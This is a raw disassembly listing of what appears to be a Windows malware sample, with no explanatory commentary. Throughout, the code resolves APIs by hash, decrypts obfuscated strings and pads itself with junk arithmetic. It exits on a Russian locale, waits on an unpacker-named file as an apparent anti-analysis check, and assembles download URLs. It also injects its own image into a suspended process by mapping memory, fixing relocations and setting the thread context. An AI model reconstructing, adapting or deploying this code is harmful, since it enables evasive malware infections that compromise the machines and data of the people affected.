sub_401C08 proc near ; CODE XREF: sub_40298E:loc_402CD0�p
; DATA XREF: sub_402806+129�o
var_3B8 = byte ptr -3B8h
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1A8 = byte ptr -1A8h
var_198 = byte ptr -198h
var_188 = byte ptr -188h
var_178 = byte ptr -178h
var_168 = byte ptr -168h
var_158 = byte ptr -158h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_38 = byte ptr -38h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 3B8h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
call sub_40102E
mov edi, 0C8AC8026h
push edi
push 1
call sub_401115
add esp, 14h
push esi
call eax
push 0Ah
push esi
push offset aXS ; "͕ȸ"
call sub_40102E
push edi
push 1
call sub_401115
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset aNxXS ; "ɹȸ"
call sub_40102E
push edi
push 1
call sub_401115
add esp, 14h
push esi
call eax
cmp dword_404104, 11h
jl short loc_401C7E
inc dword_404104
loc_401C7E: ; CODE XREF: sub_401C08+6E�j
cmp dword_404104, 9Dh
jle short loc_401C94
mov dword_404104, 14h
loc_401C94: ; CODE XREF: sub_401C08+80�j
push 7A813811h
xor ebx, ebx
push 1
mov [ebp+var_28], ebx
call sub_401115
pop ecx
pop ecx
call eax
movzx eax, ax
push 1Eh
mov [ebp+var_24], eax
pop eax
push 0FFFFFFBAh
pop ecx
loc_401CB5: ; CODE XREF: sub_401C08+BF�j
cmp ecx, 64h
ja short loc_401CBC
inc eax
inc ecx
loc_401CBC: ; CODE XREF: sub_401C08+B0�j
add eax, 31h
add ecx, 31h
cmp eax, 0A1h
jl short loc_401CB5
push 3
push esi
push offset aSq ; "\rq"
mov dword_404104, eax
call sub_40102E
push 67ECDE97h
push 1
call sub_401115
add esp, 14h
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_28]
push ecx
push ebx
push ebx
push esi
call eax
push 2
push esi
push offset aFs ; ""
call sub_40102E
push [ebp+var_28]
lea eax, [ebp+var_48]
push esi
push eax
call dword_403014 ; wsprintfA
add esp, 18h
push 24h
pop eax
push 0FFFFFFE6h
pop ecx
loc_401D1B: ; CODE XREF: sub_401C08+128�j
cmp ecx, 0B7h
ja short loc_401D25
inc eax
inc ecx
loc_401D25: ; CODE XREF: sub_401C08+119�j
add eax, 19h
add ecx, 19h
cmp eax, 0A5h
jl short loc_401D1B
push 0Ch
push esi
push offset aQiSSnXsx ; "q᭸"
mov dword_404104, eax
call sub_40102E
mov edi, dword_403000
add esp, 0Ch
push esi
lea eax, [ebp+var_1B8]
push eax
call edi ; lstrcpy
push 9
push esi
push offset aQNBXsx ; "qŭ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_1A8]
push eax
call edi ; lstrcpy
push 9
push esi
push offset aQnNXsx ; "qэ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_198]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset aQXBXsx ; "qՕݡ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_188]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset aQXsx ; "qŹ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_178]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset aQxiXsx ; "qѽŽ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_168]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset aQNnXxsXsx ; "qэٵ噸"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_158]
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 419h
jz loc_40240A
call sub_401092
test eax, eax
jnz loc_40240A
call sub_4012F6
test al, al
jz short loc_401E1C
push ebx
call sub_401472
pop ecx
loc_401E1C: ; CODE XREF: sub_401C08+20B�j
mov [ebp+var_20], ebx
mov ebx, dword_40300C
loc_401E25: ; CODE XREF: sub_401C08+5AB�j
cmp [ebp+var_20], 0
jnz short loc_401E35
push 24h
push esi
push offset aBSXaxxXxBnAEAs ; "輼ŕɽͼɹ"
jmp short loc_401E3D
; ---------------------------------------------------------------------------
loc_401E35: ; CODE XREF: sub_401C08+221�j
push 25h
push esi
push offset aBSXaASeeIesAEA ; "輼坹Ցɽͼɹ"
loc_401E3D: ; CODE XREF: sub_401C08+22B�j
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_3B8]
push eax
call edi ; lstrcpy
push 3
push esi
push offset dword_403124
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 14h
push esi
push offset dword_40310C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
add esp, 0Ch
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 0Ch
lea eax, [ebp+var_2B8]
push esi
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 410h
jnz short loc_401F34
lea eax, [ebp+var_1A8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 6
push esi
push offset dword_403100
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
add esp, 0Ch
mov [ebp+var_C], eax
jmp loc_402139
; ---------------------------------------------------------------------------
loc_401F34: ; CODE XREF: sub_401C08+2D0�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset dword_4030F0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
push 2
push esi
push offset dword_403108
mov [ebp+var_C], eax
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_178]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_4030E4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
add [ebp+var_C], eax
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_4030D8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
add [ebp+var_C], eax
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_198]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset dword_4030CC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
add [ebp+var_C], eax
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_188]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_4030BC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
add esp, 0Ch
add [ebp+var_C], eax
loc_402139: ; CODE XREF: sub_401C08+327�j
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 5
push esi
push offset dword_4030B4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
add eax, [ebp+var_C]
add esp, 0Ch
test eax, eax
jg short loc_4021BE
inc [ebp+var_20]
cmp [ebp+var_20], 2
jl loc_401E25
jmp loc_402408
; ---------------------------------------------------------------------------
loc_4021BE: ; CODE XREF: sub_401C08+5A2�j
push 3
push esi
push offset dword_403124
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
mov eax, dword_404104
add eax, 0FFFFFFA9h
cmp eax, 96h
ja short loc_40220A
inc dword_404104
loc_40220A: ; CODE XREF: sub_401C08+5FA�j
push 1Fh
push esi
push offset dword_403094
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
cmp dword_404104, 0DAh
jge short loc_40224A
inc dword_404104
loc_40224A: ; CODE XREF: sub_401C08+63A�j
push 2
push esi
mov edi, offset dword_403090
push edi
call sub_40102E
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_8]
add al, 1Dh
add esp, 18h
cmp byte ptr [ebp+var_8+1], 0
mov [ebp+var_13], al
jnz short loc_40227F
mov [ebp+var_11], 30h
jmp short loc_402287
; ---------------------------------------------------------------------------
loc_40227F: ; CODE XREF: sub_401C08+66F�j
mov al, byte ptr [ebp+var_8+1]
add al, 13h
mov [ebp+var_11], al
loc_402287: ; CODE XREF: sub_401C08+675�j
push 2
pop eax
push 0FFFFFFFCh
pop ecx
loc_40228D: ; CODE XREF: sub_401C08+69A�j
cmp ecx, 0F1h
ja short loc_402297
inc eax
inc ecx
loc_402297: ; CODE XREF: sub_401C08+68B�j
add eax, 25h
add ecx, 25h
cmp eax, 0B2h
jl short loc_40228D
push 2
push esi
push edi
mov dword_404104, eax
call sub_40102E
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_4]
add al, 17h
add esp, 18h
cmp byte ptr [ebp+var_4+1], 0
mov [ebp+var_14], al
jnz short loc_4022D9
mov [ebp+var_12], 30h
jmp short loc_4022E1
; ---------------------------------------------------------------------------
loc_4022D9: ; CODE XREF: sub_401C08+6C9�j
mov al, byte ptr [ebp+var_4+1]
add al, 19h
mov [ebp+var_12], al
loc_4022E1: ; CODE XREF: sub_401C08+6CF�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_10], 0
call ebx ; lstrcat
push 7
push esi
push offset dword_403088
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
cmp dword_404104, 0DAh
jge short loc_402332
inc dword_404104
loc_402332: ; CODE XREF: sub_401C08+722�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_8]
add esp, 18h
test ah, ah
mov [ebp+var_1B], al
mov [ebp+var_1A], 30h
jz short loc_402360
mov [ebp+var_1A], ah
loc_402360: ; CODE XREF: sub_401C08+753�j
mov eax, dword_404104
add eax, 0FFFFFFC4h
cmp eax, 8Eh
ja short loc_402375
inc dword_404104
loc_402375: ; CODE XREF: sub_401C08+765�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_4]
add esp, 18h
test ah, ah
mov [ebp+var_19], al
mov [ebp+var_1C], 30h
jz short loc_4023A3
mov [ebp+var_1C], ah
loc_4023A3: ; CODE XREF: sub_401C08+796�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_18], 0
call ebx ; lstrcat
push 4
push esi
push offset dword_403080
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017A4
mov eax, dword_404104
add eax, 0FFFFFFB4h
add esp, 0Ch
cmp eax, 9Dh
ja short loc_402408
inc dword_404104
loc_402408: ; CODE XREF: sub_401C08+5B1�j
; sub_401C08+7F8�j
xor ebx, ebx
loc_40240A: ; CODE XREF: sub_401C08+1F1�j
; sub_401C08+1FE�j
push 95902B19h
push 1
call sub_401115
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401C08 endp
; =============== S U B R O U T I N E =======================================
sub_402420 proc near ; DATA XREF: sub_402806+4E�o
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_401115
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_402468
; ---------------------------------------------------------------------------
loc_402436: ; CODE XREF: sub_402420+4F�j
push 1297812Ch
push 1
call sub_401115
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_402471
push 3D9972F5h
push 1
call sub_401115
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_401115
loc_402468: ; CODE XREF: sub_402420+14�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_402436
loc_402471: ; CODE XREF: sub_402420+29�j
pop edi
xor eax, eax
pop esi
retn 4
sub_402420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402478 proc near ; CODE XREF: sub_402806+12E�p
; sub_40298E+134�p ...
var_310 = dword ptr -310h
var_260 = dword ptr -260h
var_44 = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 310h
push ebx
push esi
push edi
call sub_401111
and eax, 0FFFF0000h
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword_404104, 1
mov [ebp+var_18], eax
lea eax, [ecx+18h]
mov esi, [eax+38h]
mov [ebp+var_24], ecx
mov [ebp+var_10], eax
mov [ebp+var_1C], esi
jl short loc_4024B4
inc dword_404104
loc_4024B4: ; CODE XREF: sub_402478+34�j
cmp dword_404104, 0B8h
jle short loc_4024CA
mov dword_404104, 14h
loc_4024CA: ; CODE XREF: sub_402478+46�j
push 0A08B638Ch
xor ebx, ebx
push 1
mov [ebp+var_1], bl
call sub_401115
pop ecx
pop ecx
push 9
call eax
mov edi, eax
mov eax, dword_404104
neg edi
sbb edi, edi
and edi, 3Ch
add eax, 0FFFFFFFDh
add edi, 4
cmp eax, 0E6h
ja short loc_402502
inc dword_404104
loc_402502: ; CODE XREF: sub_402478+82�j
push 0EF0A25B7h
push 1
call sub_401115
pop ecx
pop ecx
push ebx
push esi
push ebx
push edi
push ebx
push 0FFFFFFFFh
call eax
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_402527
xor al, al
jmp loc_402801
; ---------------------------------------------------------------------------
loc_402527: ; CODE XREF: sub_402478+A6�j
push 5CD9430h
push 1
call sub_401115
pop ecx
pop ecx
push ebx
push ebx
push ebx
push 2
push [ebp+var_8]
call eax
cmp eax, ebx
mov [ebp+var_14], eax
jz loc_4027D6
cmp dword_404104, 0D1h
jge short loc_40255C
inc dword_404104
loc_40255C: ; CODE XREF: sub_402478+DC�j
push 12h
mov esi, offset dword_404108
push esi
push offset a95eYexSmxnE ; "95Y=Mѥ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_44]
push eax
call dword_403000 ; lstrcpy
push 9
push esi
push offset dword_403214
call sub_40102E
push 0C8AC8026h
push 1
call sub_401115
add esp, 14h
push esi
call eax
push 1FC0EAEEh
push 1
mov esi, eax
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_44]
push ecx
push esi
call eax
cmp dword_404104, 2
mov [ebp+var_C], ebx
jl short loc_4025C4
inc dword_404104
loc_4025C4: ; CODE XREF: sub_402478+144�j
cmp dword_404104, 0ADh
jle short loc_4025DA
mov dword_404104, 15h
loc_4025DA: ; CODE XREF: sub_402478+156�j
mov esi, [ebp+var_1C]
push edi
push ebx
push 1
lea ecx, [ebp+var_20]
push ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_C]
push ecx
push [ebp+arg_4]
mov [ebp+var_20], esi
push [ebp+var_8]
call eax
push esi
mov esi, [ebp+var_18]
push esi
push [ebp+var_14]
call sub_4010EC
add esp, 0Ch
cmp dword_404104, 0AEh
jge short loc_402619
inc dword_404104
loc_402619: ; CODE XREF: sub_402478+199�j
mov eax, [ebp+var_24]
movzx ecx, word ptr [eax+14h]
add ecx, [ebp+var_10]
push 48h
pop eax
push 0Ah
pop edx
loc_402629: ; CODE XREF: sub_402478+1C4�j
cmp edx, 0B8h
ja short loc_402633
inc eax
inc edx
loc_402633: ; CODE XREF: sub_402478+1B7�j
add eax, 31h
add edx, 31h
cmp eax, 70h
jl short loc_402629
mov edi, [ebp+var_C]
push 2Bh
mov eax, edi
pop edx
sub eax, esi
push 1Ch
mov [ebp+var_10], eax
pop eax
loc_40264E: ; CODE XREF: sub_402478+1E8�j
cmp eax, 0C1h
ja short loc_402657
inc edx
inc eax
loc_402657: ; CODE XREF: sub_402478+1DB�j
add edx, 2Ch
add eax, 2Ch
cmp edx, 68h
jl short loc_40264E
mov dword_404104, edx
mov eax, [ecx+34h]
add eax, esi
loc_40266D: ; CODE XREF: sub_402478+206�j
cmp word ptr [eax], 0BE8Dh
jnz short loc_40267D
cmp dword ptr [eax+6], 0C009078Bh
jz short loc_402680
loc_40267D: ; CODE XREF: sub_402478+1FA�j
inc eax
jmp short loc_40266D
; ---------------------------------------------------------------------------
loc_402680: ; CODE XREF: sub_402478+203�j
mov eax, [eax+2]
add eax, [ecx+0Ch]
add eax, esi
jmp short loc_402697
; ---------------------------------------------------------------------------
loc_40268A: ; CODE XREF: sub_402478+221�j
add eax, 8
jmp short loc_402690
; ---------------------------------------------------------------------------
loc_40268F: ; CODE XREF: sub_402478+21B�j
inc eax
loc_402690: ; CODE XREF: sub_402478+215�j
cmp [eax], bx
jnz short loc_40268F
inc eax
inc eax
loc_402697: ; CODE XREF: sub_402478+210�j
cmp [eax], ebx
jnz short loc_40268A
lea esi, [edx-4Bh]
cmp esi, 84h
ja short loc_4026AD
inc edx
mov dword_404104, edx
loc_4026AD: ; CODE XREF: sub_402478+22C�j
mov ecx, [ecx+0Ch]
mov esi, [ebp+var_14]
add eax, 4
lea edx, [ecx+esi-4]
mov cl, [eax]
inc eax
cmp cl, bl
jz short loc_4026EB
loc_4026C1: ; CODE XREF: sub_402478+26E�j
cmp cl, 0F0h
jnb short loc_4026CD
movzx ecx, cl
add edx, ecx
jmp short loc_4026DC
; ---------------------------------------------------------------------------
loc_4026CD: ; CODE XREF: sub_402478+24C�j
movzx edi, word ptr [eax]
and ecx, 0Fh
shl ecx, 10h
or ecx, edi
add edx, ecx
inc eax
inc eax
loc_4026DC: ; CODE XREF: sub_402478+253�j
mov ecx, [ebp+var_10]
add [edx], ecx
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4026C1
mov edi, [ebp+var_C]
loc_4026EB: ; CODE XREF: sub_402478+247�j
push 2Dh
pop eax
push 0FFFFFFE5h
pop ecx
loc_4026F1: ; CODE XREF: sub_402478+28C�j
cmp ecx, 0A9h
ja short loc_4026FB
inc eax
inc ecx
loc_4026FB: ; CODE XREF: sub_402478+27F�j
add eax, 13h
add ecx, 13h
cmp eax, 65h
jl short loc_4026F1
sub edi, [ebp+var_18]
mov dword_404104, eax
add edi, [ebp+arg_0]
cmp [ebp+arg_8], ebx
jnz short loc_40276A
push 0E61874B3h
push 1
call sub_401115
pop ecx
pop ecx
push ebx
push ebx
push ebx
push edi
push ebx
push ebx
push [ebp+arg_4]
call eax
push 723EB0D5h
push 1
mov edi, eax
call sub_401115
pop ecx
pop ecx
push edi
call eax
push 10h
pop eax
push 0FFFFFFD1h
mov [ebp+var_1], 1
pop ecx
loc_40274C: ; CODE XREF: sub_402478+2E9�j
cmp ecx, 8Bh
ja short loc_402756
inc eax
inc ecx
loc_402756: ; CODE XREF: sub_402478+2DA�j
add eax, 2Ah
add ecx, 2Ah
cmp eax, 0C7h
jl short loc_40274C
mov dword_404104, eax
jmp short loc_4027C5
; ---------------------------------------------------------------------------
loc_40276A: ; CODE XREF: sub_402478+29C�j
push 0AA1DE02Fh
push 1
mov [ebp+var_310], 10002h
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 0AA1DC82Fh
push 1
mov [ebp+var_260], edi
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
mov eax, dword_404104
add eax, 0FFFFFFA8h
cmp eax, 7Dh
mov [ebp+var_1], 1
ja short loc_4027C5
inc dword_404104
loc_4027C5: ; CODE XREF: sub_402478+2F0�j
; sub_402478+345�j
push 77CD9567h
push 1
call sub_401115
pop ecx
pop ecx
push esi
call eax
loc_4027D6: ; CODE XREF: sub_402478+CC�j
push 723EB0D5h
push 1
call sub_401115
pop ecx
pop ecx
push [ebp+var_8]
call eax
mov eax, dword_404104
add eax, 0FFFFFFBEh
cmp eax, 0ABh
ja short loc_4027FE
inc dword_404104
loc_4027FE: ; CODE XREF: sub_402478+37E�j
mov al, [ebp+var_1]
loc_402801: ; CODE XREF: sub_402478+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_402478 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402806 proc near ; DATA XREF: sub_40298E+12F�o
; sub_40298E+30D�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push edi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
call sub_401115
pop ecx
pop ecx
push 7D0h
call eax
mov eax, dword_404104
add eax, 0FFFFFFAEh
cmp eax, 76h
ja short loc_40283B
inc dword_404104
loc_40283B: ; CODE XREF: sub_402806+2D�j
push esi
push 6FB89AF0h
xor edi, edi
push ebx
mov [ebp+var_4], edi
call sub_401115
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push edi
push edi
push offset sub_402420
push edi
push edi
call eax
push 723EB0D5h
push ebx
mov esi, eax
call sub_401115
pop ecx
pop ecx
push esi
call eax
push 49A1374Ah
push ebx
call sub_401115
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
push 0Ch
mov esi, offset dword_404108
push esi
push offset aQNbXsx ; "qٍѸ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_14C]
push eax
call dword_40300C ; lstrcat
push 3Ah
pop esi
push 0FFFFFFD8h
pop eax
loc_4028B3: ; CODE XREF: sub_402806+C0�j
cmp eax, 7Dh
ja short loc_4028BA
inc esi
inc eax
loc_4028BA: ; CODE XREF: sub_402806+B0�j
add esi, 1Eh
add eax, 1Eh
cmp esi, 86h
jl short loc_4028B3
push 40h
lea eax, [ebp+var_44]
push edi
push eax
mov dword_404104, esi
mov [ebp+var_48], 44h
call sub_4010B9
add esp, 0Ch
cmp esi, 0F4h
mov [ebp+var_1C], ebx
mov [ebp+var_18], 5
jge short loc_4028FC
inc esi
mov dword_404104, esi
loc_4028FC: ; CODE XREF: sub_402806+ED�j
push 46318AC7h
push ebx
call sub_401115
pop ecx
pop ecx
push offset dword_40420C
lea ecx, [ebp+var_48]
push ecx
push edi
push edi
push 4
push edi
push edi
push edi
lea ecx, [ebp+var_14C]
push ecx
push edi
call eax
push dword_404210
push dword_40420C
push offset sub_401C08
call sub_402478
add esp, 0Ch
test al, al
jz short loc_402956
mov esi, dword_404210
push 7B88BF3Bh
push ebx
call sub_401115
pop ecx
pop ecx
push esi
call eax
loc_402956: ; CODE XREF: sub_402806+138�j
push 62h
pop eax
push 3
pop ecx
pop esi
loc_40295D: ; CODE XREF: sub_402806+169�j
cmp ecx, 6Eh
ja short loc_402964
inc eax
inc ecx
loc_402964: ; CODE XREF: sub_402806+15A�j
add eax, 29h
add ecx, 29h
cmp eax, 0A6h
jl short loc_40295D
push 768AA260h
push ebx
mov dword_404104, eax
call sub_401115
pop ecx
pop ecx
push edi
call eax
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_402806 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40298E proc near ; CODE XREF: start+1BC�j
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_38 = byte ptr -38h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_13C]
push edi
mov [ebp+var_4], eax
call sub_4012F6
xor ebx, ebx
test al, al
jz loc_402CD0
cmp dword_404104, 1Eh
jge short loc_4029C1
inc dword_404104
loc_4029C1: ; CODE XREF: sub_40298E+2B�j
mov edi, 774393E8h
push edi
push 1
call sub_401115
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp+var_13C]
push ecx
push ebx
call eax
xor ecx, ecx
cmp eax, ebx
jz short loc_4029FB
loc_4029E6: ; CODE XREF: sub_40298E+6B�j
lea edx, [ebp+ecx+var_13B]
cmp byte ptr [edx-1], 5Ch
jnz short loc_4029F6
mov [ebp+var_4], edx
loc_4029F6: ; CODE XREF: sub_40298E+63�j
inc ecx
cmp ecx, eax
jnz short loc_4029E6
loc_4029FB: ; CODE XREF: sub_40298E+56�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, 20202020h
or edx, eax
cmp edx, 6C707865h
jnz loc_402AF7
mov edx, [ecx+4]
or edx, eax
cmp edx, 7265726Fh
jnz loc_402AF7
mov ecx, [ecx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_402AF7
mov eax, [ebp+arg_4]
dec eax
jnz loc_402AF0
push 8
pop ecx
push 0Ch
mov esi, offset dword_404108
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset aXsXXsx ; "ɕɸ"
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_401472
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_402AF0
cmp dword_404104, 12h
jl short loc_402A88
inc dword_404104
loc_402A88: ; CODE XREF: sub_40298E+F2�j
cmp dword_404104, 0A3h
jle short loc_402A9E
mov dword_404104, 27h
loc_402A9E: ; CODE XREF: sub_40298E+104�j
push 99A4299Dh
push 1
call sub_401115
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
